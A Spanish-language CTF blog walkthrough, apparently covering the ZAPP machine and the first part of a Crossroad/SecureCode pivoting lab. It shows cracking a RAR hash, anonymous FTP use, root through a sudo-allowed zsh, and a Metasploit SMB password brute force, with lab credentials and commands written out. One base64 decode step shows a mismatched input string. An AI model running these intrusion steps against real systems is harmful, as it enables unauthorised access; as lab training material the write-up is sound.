Skill

- Crack rar password file / rar2john
- Crack hash rar / johntheripper
- Ftp Anonymous login
- Think out of the box / CTF like
- Sudo permition Abuse / Escalation Privilage

Colaboraciones

Esta máquina fue realizada con Corvus; les dejo su página por si la quieren revisar → https://corvush4ck.com/

Reconocimiento

Para comenzar, como siempre, vamos a crearnos nuestros directorios de trabajo.

$ mkdir ZAPP            
$ cd ZAPP
$ mkdir nmap content exploit
ls
content  exploit  nmap

Vamos a realizar el escaneo con nmap, para ver los puertos abiertos que tiene la máquina.

nmap -p- --open -Pn -vvv -n -sS --min-rate 5000 192.168.0.22 -oG Allports

# Nmap 7.93 scan initiated Sat Nov 15 17:05:08 2025 as: nmap -p- --open -Pn -vvv -n -sS --min-rate 5000 -oG Allports 192.168.0.22
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 192.168.0.22 ()   Status: Up
Host: 192.168.0.22 ()   Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http///   Ignored State: closed (65532)
# Nmap done at Sat Nov 15 17:05:14 2025 -- 1 IP address (1 host up) scanned in 6.42 seconds

Como vemos, están abiertos los puertos: 21, 22, 80. Vamos a realizar un escaneo más profundo, para ver más información.

nmap -sCV -p22,80,21 192.168.0.22 -oN Targeted

# Nmap 7.93 scan initiated Sat Nov 15 17:05:35 2025 as: nmap -sCV -p22,80,21 -oN Targeted 192.168.0.22
Nmap scan report for 192.168.0.22
Host is up (0.0085s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.0.13
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              28 Oct 29 20:59 login.txt
|_-rw-r--r--    1 0        0              65 Oct 29 21:23 secret.txt
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u5 (protocol 2.0)
| ssh-hostkey: 
|   3072 a323b3aadfc651cba20c928e6bfe96ee (RSA)
|   256 fd952f2f7f5a21b50e752cda18c95235 (ECDSA)
|_  256 a10e0d798e543e0eed2f96d6d39a9fa6 (ED25519)
80/tcp open  http    Apache httpd 2.4.65 ((Debian))
|_http-server-header: Apache/2.4.65 (Debian)
|_http-title: zappskred - CTF Challenge
MAC Address: D8:F3:BC:4D:AC:A3 (Liteon Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 15 17:06:00 2025 -- 1 IP address (1 host up) scanned in 25.65 seconds

Vemos que el puerto 21 (ftp) tiene habilitado el usuario anonymous.

Vamos a conectarnos para ver qué contiene:

ftp anonymous@192.168.0.22                               
Connected to 192.168.0.22.
220 Welcome zappskred.
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||18219|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              28 Oct 29 20:59 login.txt
-rw-r--r--    1 0        0              65 Oct 29 21:23 secret.txt
226 Directory send OK.

Vemos dos archivos; vamos a descargarlos para ver su contenido.

ftp> get login.txt

$ cat login.txt

puerto
4444
coffee
GoodLuck

$ cat secret.txt

0jO cOn 31 c4fe 813n p23p424dO, 4 v3c35 14 pista 357a 3n 14 7424

Vemos varias palabras, y un mensaje que dice algo como “Ojo con el café bien preparado, a veces la pista está en la taza”.

Vamos a revisar la página web para ver qué contenido tiene:

Vemos una imagen y poco más; vamos a revisar el código fuente. Para ver si hay algo raro.

Vemos una cadena que parece estar en base64: “VjFST1YyRkhVa2xUYmxwYVRURmFiMXBGYUV0a2JWSjBWbTF3WVZkRk1VeERaejA5Q2c9PQo=“.

Vamos a ver qué dice; tuve que realizar el siguiente comando 4 veces.

echo "f0db7bd084e1a9edad5c14c72a8a0677" | base64 -d

cuatrocuatroveces

Vemos la frase “cuatrocuatroveces”; pruebo eso como dirección en la página para ver si existe el directorio:

Vemos un Sup3rP4ss.rar; si lo intentamos extraer, nos pide una pass.

Por tanto, voy a jugar con rar2john, para extraer un hash, y luego intentar romperlo.

$ rar2john Sup3rP4ss.rar

Sup3rP4ss.rar:$rar5$16$7fd9df5fd4277912db70ac859ba28061$15$48def3bf4ba6f34e055c2b18ce80081c$8$0a8addf4f732b161

Vamos a guardar ese hash e intentar romperlo; voy a tirar del rockyou.txt.

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 128/128 SSE2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Note: Passwords longer than 10 [worst case UTF-8] to 32 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
reema            (Sup3rP4ss.rar)     
1g 0:00:08:19 DONE (2025-11-16 14:19) 0.002003g/s 169.1p/s 169.1c/s 169.1C/s rockyou2009..randy06
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Vemos que la pass es “reema”; vamos a extraer el contenido para ver qué contiene.

7z l Sup3rP4ss.rar

7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
 64-bit locale=en_US.UTF-8 Threads:4 OPEN_MAX:524288, ASM

Scanning the drive for archives:
1 file, 174 bytes (1 KiB)

Listing archive: Sup3rP4ss.rar

--
Path = Sup3rP4ss.rar
Type = Rar5
Physical Size = 174
Characteristics = Locator QuickOpen:0
Encrypted = -
Solid = -
Blocks = 1
Method = v6:128K:m3
Multivolume = -
Volumes = 1

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2025-10-30 17:28:23 ....A           34           48  Sup3rP4ss.txt
------------------- ----- ------------ ------------  ------------------------
2025-10-30 17:28:23                 34           48  1 files

Vemos un Sup3rp4ss.txt; vamos a ver su contenido.

cat Sup3rP4ss.txt

Intenta probar con más >> 3spuM4

Vemos una posible credencial, quizás, “3spuM4“.

Luego de investigar, me encuentro algo curioso en el title page:

curl -v 192.168.0.22 2>&1 | grep "<title>"

    <title>zappskred - CTF Challenge</title>

Vemos un zappskred; me pareció un usuario y teniendo una posible pass “3spuM4“.

Intenté conectarme por SSH.

ssh zappskred@192.168.0.22

    ███████╗ █████╗ ██████╗ ██████╗ 
 ╚══███╔╝██╔══██╗██╔══██╗██╔══██╗
   ███╔╝ ███████║██████╔╝██████╔╝
  ███╔╝  ██╔══██║██╔═══╝ ██╔═══╝ 
 ███████╗██║  ██║██║     ██║     
 ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝     


zappskred@192.168.0.22's password: 
Linux TheHackersLabs-ZAPP 5.10.0-36-amd64 #1 SMP Debian 5.10.244-1 (2025-09-29) x86_64

Last login: Sat Nov 15 14:43:05 2025 from 192.168.0.13
ZAPP
+)Creador: puerto4444
+)Nombre: ZAPP
+)IP: 192.168.0.22
----------------------------------------
zappskred@TheHackersLabs-ZAPP:~$

Y funcionó, logramos ingresar a la máquina como el usuario “zappskred”; ahora solo nos falta escalar privilegios.

Escalada de Privilegios

Haciendo un “sudo -l” y colocando la pass del usuario, vemos lo siguiente:

sudo -l

sudo: unable to resolve host TheHackersLabs-ZAPP: Name or service not known
[sudo] password for zappskred: 
Matching Defaults entries for zappskred on TheHackersLabs-ZAPP:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zappskred may run the following commands on TheHackersLabs-ZAPP:
    (root) /bin/zsh

Vemos que podemos ejecutar como root “/bin/zsh“, por tanto, es simplemente usar la siguiente línea y seríamos root:

sudo zsh

sudo: unable to resolve host TheHackersLabs-ZAPP: Name or service not known
TheHackersLabs-ZAPP# whoami
root
TheHackersLabs-ZAPP#

Y con eso terminaríamos la máquina.

Conclusiones

Bastante interesante la intrusión; tuve que darle varias vueltas para encontrar ese user en el title de la página; luego la escalada sí es bastante básica.

Pero me gustó porque me hizo pensar fuera de lo normal.

Ya saben, cualquier duda o consulta, etc. Puedes escribir en los comentarios o escribirme directamente al Discord.

Explicacion del Laboratorio

Este laboratorio está diseñado para practicar pivoting; vamos a estar vulnerando 2 máquinas de VulnHub.

• Crossroad

• SecureCode

Donde existen 2 redes, la máquina Crossroad 1 simulará la primera red. Esta tiene una segunda red donde tiene conexión con la máquina SecureCode 2, simulando la segunda red.

Observaciones

En este caso no estaré utilizando la herramienta de ligolo-ng; para el siguiente laboratorio utilizaremos esta herramienta, para que vean cómo facilita el trabajo de conexiones.

En caso de querer preparar/montar estos tipos de laboratorios de forma local para practicar, subiré la forma de cómo preparar estos tipos de laboratorios en un futuro.

También para futuros laboratorios, vamos a introducir máquinas Windows y Linux mezcladas en un mismo laboratorio.

Skills

### Crossroads
- Magic script - Samba -> RCE
- Stenography Analysis / Stegoveritas tool
- rpcclient SAMBA enum
- SAMBA password brute force
- Brute Force Password root / Custom Binary
### Securecode
- Chisel / Socat pivoting Tools
- Fuzing obtain backup
- SQLI Blind Web Code Response Based
- Bypass file upload -> RCE.

Reconocimiento - Crossroad

Para empezar como siempre nos creamos nuestros directorios de trabajo

mkdir -p Crossroad/nmap
cd Crossroad
mkdir content exploit
cd nmap

Luego vamos a proseguir con el escaneo de puertos, para ver qué servicios están expuestos en la máquina Crossroad.

Voy a usar un script automático que creé hace poco para la enumeración.

./autoscan.sh -i 192.168.0.26 -n

[+] Realizando escaneo con nmap, IP: 192.168.0.26


[+]Escaneo de nmap sobre la ip: 192.168.0.26 - Puertos: 80,139,445

Como se puede apreciar, vemos los puertos 80, 139 y 445.

# Nmap 7.93 scan initiated Fri Jul 25 19:54:39 2025 as: nmap -p80,139,445 -sCV -oN targeted 192.168.0.26
Nmap scan report for 192.168.0.26
Host is up (0.016s latency).

PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/crossroads.png
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: D8:F3:BC:4D:AC:A3 (Liteon Technology)
Service Info: Host: CROSSROADS

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: crossroads
|   NetBIOS computer name: CROSSROADS\x00
|   Domain name: \x00
|   FQDN: crossroads
|_  System time: 2025-07-25T17:55:04-05:00
| smb2-time: 
|   date: 2025-07-25T22:55:04
|_  start_date: N/A
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 25 19:55:04 2025 -- 1 IP address (1 host up) scanned in 25.25 seconds

Vemos una página web 80 y un servicio de Samba en el puerto 445.

Vamos a revisar cómo se ve la web.

Parece ser una agencia que se encarga de ayudar a las personas con diversas adicciones.

Vamos a realizar un WhatWeb para ver las tecnologías que utiliza.

whatweb http://192.168.0.26                        
http://192.168.0.26 [200 OK] AddThis, Apache[2.4.38], Bootstrap, Country[RESERVED][ZZ], Frame, Google-Analytics[Universal][UA-15284593-1], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.0.26], JQuery[3.3.1], Open-Graph-Protocol[website], Script[application/ld+json,text/javascript], Title[12 Step Treatment Center | Crossroads Centre Antigua], WordPress, YouTube

Vemos bastante información, vemos WordPress, jQuery, etc.

Vamos a realizar fuzzing para ver qué directorios nos encontramos.

ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://192.168.0.26/FUZZ"

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.26/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 19ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 22ms]
#                       [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 16ms]
#                       [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 12ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 13ms]
#                       [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 20ms]
# Copyright 2007 James Fisher [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 25ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 18ms]
# on at least 2 different hosts [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 683ms]
                        [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 689ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 917ms]
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 1243ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 1298ms]
#                       [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 1305ms]
                        [Status: 200, Size: 93075, Words: 6250, Lines: 1057, Duration: 50ms]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 11ms]

Vemos un server-status; vamos a ver si existe contenido compartido por Samba en el puerto 445.

smbclient --no-pass --user '' --list 192.168.0.26 

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    smbshare        Disk      
    IPC$            IPC       IPC Service (Samba 4.9.5-Debian)

Vemos algunos recursos, pero no tienen nada interesante; nos podemos conectar con rpcclient y vemos un usuario.

rpcclient -U '' -N "192.168.0.26" 
rpcclient $> enumdomusers
user:[albert] rid:[0x3e9]
rpcclient $> queryuser 0x3e9
    User Name   :    albert
    Full Name   :    
    Home Drive  :    \\crossroads\albert
    Dir Drive   :    
    Profile Path:    \\crossroads\albert\profile
    Logon Script:    
    Description :    
    Workstations:    
    Comment     :    
    Remote Dial :
    Logon Time               :    Wed, 31 Dec 1969 20:00:00 -04
    Logoff Time              :    Wed, 06 Feb 2036 12:06:39 -03
    Kickoff Time             :    Wed, 06 Feb 2036 12:06:39 -03
    Password last set Time   :    Tue, 02 Mar 2021 20:13:00 -03
    Password can change Time :    Tue, 02 Mar 2021 20:13:00 -03
    Password must change Time:    Wed, 13 Sep 30828 23:48:05 -03
    unknown_2[0..31]...
    user_rid :    0x3e9
    group_rid:    0x201
    acb_info :    0x00000010
    fields_present:    0x00ffffff
    logon_divs:    168
    bad_password_count:    0x00000000
    logon_count:    0x00000000
    padding1[0..7]...
    logon_hrs[0..21]...
rpcclient $> netshareenumall
netname: print$
    remark:    Printer Drivers
    path:    C:\var\lib\samba\printers
    password:    
netname: smbshare
    remark:    
    path:    C:\home\albert\smbshare
    password:    
netname: IPC$
    remark:    IPC Service (Samba 4.9.5-Debian)
    path:    C:\tmp
    password:

Vemos la estructura de las carpetas compartidas y vemos el usuario albert.

Luego de intentar varias cosas, reviso el crossroads.png que nos detectó el nmap por medio del robots.txt.

En los ctfs, suele llamar la atención tener una imagen en la raíz de la web; seguramente tenga información oculta.

Luego de probar varias herramientas para detectar información en una imagen, me encuentro con la siguiente → Stegovita.

El cual dejó correr por un rato y parece encontrar un archivo zip.

stegoveritas crossroads.png
Running Module: SVImage
+---------------------------+------+
|        Image Format       | Mode |
+---------------------------+------+
| Portable network graphics | RGB  |
+---------------------------+------+
Found something worth keeping!
MPEG ADTS, layer III, v1, 80 kbps, Monaural
Running Module: MultiHandler

Found something worth keeping!
PNG image data, 1106 x 876, 8-bit/color RGB, non-interlaced
+--------+------------------+-------------------------------------------+-----------+
| Offset | Carved/Extracted | Description                               | File Name |
+--------+------------------+-------------------------------------------+-----------+
| 0x69f  | Carved           | Zlib compressed data, default compression | 69F.zlib  |
| 0x69f  | Extracted        | Zlib compressed data, default compression | 69F       |
+--------+------------------+-------------------------------------------+-----------+
Exif
====
+----------------------+--------------------------------------------------------------------------------------------------+
| key                  | value                                                                                            |
+----------------------+--------------------------------------------------------------------------------------------------+
| SourceFile           | /workspace/Pivoting/Crossroad/content/crossroads.png                                             |
| ExifToolVersion      | 12.57                                                                                            |
| FileName             | crossroads.png                                                                                   |
| Directory            | /workspace/Pivoting/Crossroad/content                                                            |
| FileSize             | 1100 kB                                                                                          |
| FileModifyDate       | 2021:03:02 19:05:35-03:00                                                                        |
| FileAccessDate       | 2025:08:06 07:27:34-03:00                                                                        |
| FileInodeChangeDate  | 2025:07:26 20:23:11-03:00                                                                        |
| FilePermissions      | -rw-rw----                                                                                       |
| FileType             | PNG                                                                                              |
| FileTypeExtension    | png                                                                                              |
| MIMEType             | image/png                                                                                        |
| ImageWidth           | 1106                                                                                             |
| ImageHeight          | 876                                                                                              |
| BitDepth             | 8                                                                                                |
| ColorType            | RGB                                                                                              |
| Compression          | Deflate/Inflate                                                                                  |
| Filter               | Adaptive                                                                                         |
| Interlace            | Noninterlaced                                                                                    |
| PixelsPerUnitX       | 2835                                                                                             |
| PixelsPerUnitY       | 2835                                                                                             |
| PixelUnits           | meters                                                                                           |
| XMPToolkit           | Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39                                           |
| CreatorTool          | Adobe Photoshop CC 2018 (Windows)                                                                |
| CreateDate           | 2021:03:03 01:05:34+03:00                                                                        |
| MetadataDate         | 2021:03:03 01:05:34+03:00                                                                        |
| ModifyDate           | 2021:03:03 01:05:34+03:00                                                                        |
| InstanceID           | xmp.iid:4204c92b-8096-1f44-95a6-bea1cf3b10b1                                                     |
| DocumentID           | adobe:docid:photoshop:332b0d56-e404-b344-995b-0552ba0e91fc                                       |
| OriginalDocumentID   | xmp.did:099252d2-406b-7a48-8f06-3b7f7410f183                                                     |
| ColorMode            | RGB                                                                                              |
| Format               | image/png                                                                                        |
| HistoryAction        | ['created', 'saved']                                                                             |
| HistoryInstanceID    | ['xmp.iid:099252d2-406b-7a48-8f06-3b7f7410f183', 'xmp.iid:4204c92b-8096-1f44-95a6-bea1cf3b10b1'] |
| HistoryWhen          | ['2021:03:03 01:05:34+03:00', '2021:03:03 01:05:34+03:00']                                       |
| HistorySoftwareAgent | ['Adobe Photoshop CC 2018 (Windows)', 'Adobe Photoshop CC 2018 (Windows)']                       |
| HistoryChanged       | /                                                                                                |
| DocumentAncestors    | F35C96A263F2934D8C732E0185DBC23E                                                                 |
| ImageSize            | 1106x876                                                                                         |
| Megapixels           | 0.969                                                                                            |
+----------------------+--------------------------------------------------------------------------------------------------+
XMPP
====
+----------------------------------------+--------------------------------------------------------------+
|                  key                   |                            value                             |
+----------------------------------------+--------------------------------------------------------------+
|           'xmp:CreatorTool'            |             'Adobe Photoshop CC 2018 (Windows)'              |
|            'xmp:CreateDate'            |                 '2021-03-03T01:05:34+03:00'                  |
|           'xmp:MetadataDate'           |                 '2021-03-03T01:05:34+03:00'                  |
|            'xmp:ModifyDate'            |                 '2021-03-03T01:05:34+03:00'                  |
|           'xmpMM:InstanceID'           |        'xmp.iid:4204c92b-8096-1f44-95a6-bea1cf3b10b1'        |
|           'xmpMM:DocumentID'           | 'adobe:docid:photoshop:332b0d56-e404-b344-995b-0552ba0e91fc' |
|       'xmpMM:OriginalDocumentID'       |        'xmp.did:099252d2-406b-7a48-8f06-3b7f7410f183'        |
|            'xmpMM:History'             |                              ''                              |
|           'xmpMM:History[1]'           |                              ''                              |
|    'xmpMM:History[1]/stEvt:action'     |                          'created'                           |
|  'xmpMM:History[1]/stEvt:instanceID'   |        'xmp.iid:099252d2-406b-7a48-8f06-3b7f7410f183'        |
|     'xmpMM:History[1]/stEvt:when'      |                 '2021-03-03T01:05:34+03:00'                  |
| 'xmpMM:History[1]/stEvt:softwareAgent' |             'Adobe Photoshop CC 2018 (Windows)'              |
|           'xmpMM:History[2]'           |                              ''                              |
|    'xmpMM:History[2]/stEvt:action'     |                           'saved'                            |
|  'xmpMM:History[2]/stEvt:instanceID'   |        'xmp.iid:4204c92b-8096-1f44-95a6-bea1cf3b10b1'        |
|     'xmpMM:History[2]/stEvt:when'      |                 '2021-03-03T01:05:34+03:00'                  |
| 'xmpMM:History[2]/stEvt:softwareAgent' |             'Adobe Photoshop CC 2018 (Windows)'              |
|    'xmpMM:History[2]/stEvt:changed'    |                             '/'                              |
|         'photoshop:ColorMode'          |                             '3'                              |
|     'photoshop:DocumentAncestors'      |                              ''                              |
|    'photoshop:DocumentAncestors[1]'    |              'F35C96A263F2934D8C732E0185DBC23E'              |
|              'dc:format'               |                         'image/png'                          |
+----------------------------------------+--------------------------------------------------------------+

ls
crossroads.png  results  stegoVeritas
cd results/keepers 
ls
1754485771.5929751-79b4d1696d3daa931d994e6c8ff3bcbc  69F 
1754485848.7338853-e141a773742528eeded2c24b53183913  69F.zlib
1854610042.114s957-3161a756330490eac297cc43f23494c7

Voy a descomprimirlo para ver qué contiene, el 69F.zlib.

zlib-flate -uncompress < 69F.zlib > decompressed
ls
1754485771.5929751-79b4d1696d3daa931d994e6c8ff3bcbc  69F       decompressed
1754485848.7338853-e141a773742528eeded2c24b53183913  69F.zlib
1854610042.114s957-3161a756330490eac297cc43f23494c7

file decompressed 
decompressed: data

Veo que el tipo es data, lo analizo con Ghidra, pero no encuentro nada interesante.

Hice enumeración con rpcclient mientras analizaba el binario; tenía el usuario albert, pero no la contraseña. Probé con varias formas de realizar fuerza bruta con netexec, hydra, medusa, etc.

Pero solo funcionó con un módulo auxiliar de Metasploit, por eso es importante probar el mismo ataque con varias herramientas distintas o con la misma varias veces.

msfconsole                                        
Metasploit tip: Use the edit command to open the currently active module 
in your editor


         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


       =[ metasploit v6.4.33-dev-4422322                  ]
+ -- --=[ 2459 exploits - 1266 auxiliary - 430 post       ]
+ -- --=[ 1468 payloads - 49 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search smb_login

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login  .                normal  No     SMB Login Check Scanner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_login

msf6 > use 0
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/smb/smb_login) >options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   ANONYMOUS_LOGIN    false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   CreateSession      false            no        Create a new session for every successful login
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted:
                                                  none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-meta
                                                 sploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair pe
                                                 r line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.0.26
RHOSTS => 192.168.0.26
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser albert
SMBUser => albert
msf6 auxiliary(scanner/smb/smb_login) > run

Luego de un rato veo lo siguiente:

[-] 192.168.0.26:445      - 192.168.0.26:445 - Failed: '.\albert:smile4me',
[-] 192.168.0.26:445      - 192.168.0.26:445 - Failed: '.\albert:sherman',
[-] 192.168.0.26:445      - 192.168.0.26:445 - Failed: '.\albert:glenn',
[-] 192.168.0.26:445      - 192.168.0.26:445 - Failed: '.\albert:gabby1',
[-] 192.168.0.26:445      - 192.168.0.26:445 - Failed: '.\albert:family5',
[-] 192.168.0.26:445      - 192.168.0.26:445 - Failed: '.\albert:eddie1',
[-] 192.168.0.26:445      - 192.168.0.26:445 - Failed: '.\albert:dodgers',
[-] 192.168.0.26:445      - 192.168.0.26:445 - Failed: '.\albert:cheska',
[+] 192.168.0.26:445      - 192.168.0.26:445 - Success: '.\albert:bradley1'

Por tanto, tenemos una contraseña; vamos a listar el contenido para ver si tenemos más permisos con smbmap.

smbmap -H 192.168.0.26 -u albert -p bradley1

[+] IP: 192.168.0.26:445    Name: crossroadsantigua.org    Status: Authenticated
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    print$                                                READ ONLY    Printer Drivers
    smbshare                                              READ, WRITE    
    IPC$                                                  NO ACCESS    IPC Service (Samba 4.9.5-Debian)
    albert                                                READ ONLY    Home Directories

Veo que tengo acceso ahora a smbshare; vamos a echarle un vistazo.

smbclient --password=bradley1 -U "albert" \\\\192.168.0.26\\smbshare       
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  7 18:49:15 2025
  ..                                  D        0  Sat Mar  6 09:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 19:14:54 2021

Veo un smb.conf, vamos a ver qué es.

Veo ciertas configuraciones, pero me llama la atención lo siguiente:

[smbshare]
path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
@ = smbscript.sh
guest ok = no

Hay un “magic script“, smbscript.sh.

Vamos a revisar la otra carpeta compartida de nombre Albert.

smbclient --password=bradley1 -U "albert" \\\\192.168.0.26\\albert  
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Mar  6 09:45:15 2021
  ..                                  D        0  Tue Mar  2 19:00:47 2021
  smbshare                            D        0  Thu Aug  7 19:05:08 2025
  crossroads.png                      N  1583196  Tue Mar  2 19:34:03 2021
  beroot                              N    16664  Tue Mar  2 20:02:41 2021
  user.txt                            N     1805  Sun Jan  3 14:56:19 2021

        4000320 blocks of size 1024. 3759668 blocks available

Vemos un user.txt, que es la primera flag. Luego vemos la otra carpeta smbshare y la imagen crossroads.png.

Hay otro archivo beroot. Vamos a analizarlo para ver qué es.

smb: \> get beroot 
getting file \beroot of size 16664 as beroot (428.2 KiloBytes/sec) (average 428.2 KiloBytes/sec)

file beroot  
beroot: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c1da1f0fded1889d32e27b99a2a4bd170c30349b, for GNU/Linux 3.2.0, not stripped

Parece ser un binario para Linux; voy a darle permisos de ejecución y analizarlo para ver qué hace.
Intento analizarlo con ltrace o strace, pero necesita librerías y el programa no se ejecuta.

